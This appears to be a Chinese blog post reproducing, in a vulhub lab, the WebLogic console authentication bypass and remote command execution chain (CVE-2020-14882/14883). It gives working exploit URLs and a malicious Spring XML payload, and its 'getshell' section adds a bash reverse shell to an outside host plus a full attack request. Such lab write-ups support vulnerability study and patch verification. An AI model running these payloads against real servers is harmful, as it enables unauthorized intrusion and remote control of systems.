vulhub-weblogic

Weblogic 管理控制台未授权远程命令执行漏洞(CVE-2020-14882,CVE-2020-14883)

Weblogic是Oracle公司推出的J2EE应用服务器。在2020年10月的更新中,Oracle官方修复了两个长亭科技安全研究员@voidfyoo 提交的安全漏洞,分别是CVE-2020-14882和CVE-2020-14883。

CVE-2020-14882允许未授权的用户绕过管理控制台的权限验证访问后台,CVE-2020-14883允许后台任意用户通过HTTP协议执行任意命令。使用这两个漏洞组成的利用链,可通过一个GET请求在远程Weblogic服务器上以未授权的任意用户身份执行命令。

参考链接:

  • https://www.oracle.com/security-alerts/cpuoct2020traditional.html
  • https://testbnull.medium.com/weblogic-rce-by-only-one-get-request-cve-2020-14882-analysis-6e4b09981dbf

漏洞环境

执行如下命令启动一个Weblogic 12.2.1.3版本的服务器:

docker-compose up -d

启动完成后,访问http://your-ip:7001/console即可查看到后台登录页面。

漏洞复现

首先测试权限绕过漏洞(CVE-2020-14882),访问以下URL,即可未授权访问到管理后台页面:

http://your-ip:7001/console/css/%252e%252e%252fconsole.portal

在这里插入图片描述

访问后台后,可以发现我们现在是低权限的用户,无法安装应用,所以也无法直接执行任意代码:

在这里插入图片描述

此时需要利用到第二个漏洞CVE-2020-14883。这个漏洞的利用方式有两种,一是通过com.tangosol.coherence.mvel2.sh.ShellSession,二是通过com.bea.core.repackaged.springframework.context.support.FileSystemXmlApplicationContext

直接访问如下URL,即可利用com.tangosol.coherence.mvel2.sh.ShellSession执行命令:

http://your-ip:7001/console/css/%252e%252e%252fconsole.portal?_nfpb=true&_pageLabel=&handle=com.tangosol.coherence.mvel2.sh.ShellSession("java.lang.Runtime.getRuntime().exec('touch%20/tmp/success1');")

进入容器,可以发现touch /tmp/success1已成功执行:

在这里插入图片描述

这个利用方法只能在Weblogic 12.2.1以上版本利用,因为10.3.6并不存在com.tangosol.coherence.mvel2.sh.ShellSession类。

com.bea.core.repackaged.springframework.context.support.FileSystemXmlApplicationContext是一种更为通杀的方法,最早在CVE-2019-2725被提出,对于所有Weblogic版本均有效。

首先,我们需要构造一个XML文件,并将其保存在Weblogic可以访问到的服务器上,如http://example.com/rce.xml

<?xml version="1.0" encoding="UTF-8" ?>
<beans xmlns="http://www.springframework.org/schema/beans"
   xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
   xsi:schemaLocation="http://www.springframework.org/schema/beans http://www.springframework.org/schema/beans/spring-beans.xsd">
    <bean id="pb" class="java.lang.ProcessBuilder" init-method="start">
        <constructor-arg>
          <list>
            <value>bash</value>
            <value>-c</value>
            <value><![CDATA[touch /tmp/success2]]></value>
          </list>
        </constructor-arg>
    </bean>
</beans>

然后通过如下URL,即可让Weblogic加载这个XML,并执行其中的命令:

http://your-ip:7001/console/css/%252e%252e%252fconsole.portal?_nfpb=true&_pageLabel=&handle=com.bea.core.repackaged.springframework.context.support.FileSystemXmlApplicationContext("http://example.com/rce.xml")

在这里插入图片描述

这个利用方法也有自己的缺点,就是需要Weblogic的服务器能够访问到恶意XML。

getshell

使用xml的方式来获取shell;
1、先使用服务器104.207.xx.xx,上面写少poc.xml

<beans xmlns="http://www.springframework.org/schema/beans" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="http://www.springframework.org/schema/beans http://www.springframework.org/schema/beans/spring-beans.xsd">
  <bean id="pb" class="java.lang.ProcessBuilder" init-method="start">
    <constructor-arg>
      <list>
		<value>bash</value>
		<value>-c</value>
		<value><![CDATA[bash -i >& /dev/tcp/149.28.xx.xx/4444 0>&1]]></value>
      </list>
    </constructor-arg>
  </bean>
</beans>

2、在放poc.xml的服务器上,通过python来开启一个服务,让被攻击的服务器来下载:
在这里插入图片描述
3、在监听的机器上监听:
在这里插入图片描述

4、发包:

http://192.168.99.100:7001/console/css/%252e%252e%252fconsole.portal?_nfpb=true&_pageLabel=&handle=com.bea.core.repackaged.springframework.context.support.FileSystemXmlApplicationContext("http://*.*.*.*/evil.xml")

GET /console/css/%252e%252e%252fconsole.portal?_nfpb=true&_pageLabel=&handle=com.bea.core.repackaged.springframework.context.support.FileSystemXmlApplicationContext("http://104.207.xx.xx:8000/poc.xml") HTTP/1.1
Host: 149.xx.xx.xx:7001
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36
Accept: */*
Referer: http://149.xx.xx.xx:7001/console/css/%252e%252e%252fconsole.portal
Accept-Language: zh-CN,zh;q=0.9
Cookie: ADMINCONSOLESESSION=UU7H_Pzp0Rfi7t3WOUlX0OsnBBcYW4qgPTsfVO0Y5YOxwR78mM0K!394758852; ECS[visit_times]=2; SESSbb36b7f467d752b72cd262e95b89e9f4=9TcUkVUMO2-3O-pbIjvxSNuIz_2fb0IBgRa5ml4EOw8; Drupal.toolbar.collapsed=0; SESScdd472b3d54c289b80603d5f93a10e98=Y_zoNLL64FBS6yWutP_SuNZ7aiNsa-gl5U_W9EO3XLE; CFID=1; CFTOKEN=dfa0ec39a3b0c778-C67BC065-08DC-191A-BD17466F098E86F3; CFADMIN_LASTPAGE_ADMIN=%2FCFIDE%2Fadministrator%2Fscheduler%2Fscheduletasks%2Ecfm; ADMINCONSOLESESSION=26yHfxyFGmyMKyJgfpC8C4rqQ33vd0GPsD5cXQGdQs1WH53VdxS7!-998563785
Accept-Encoding: gzip, deflate
Connection: close


5、成功获得shell:
在这里插入图片描述

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值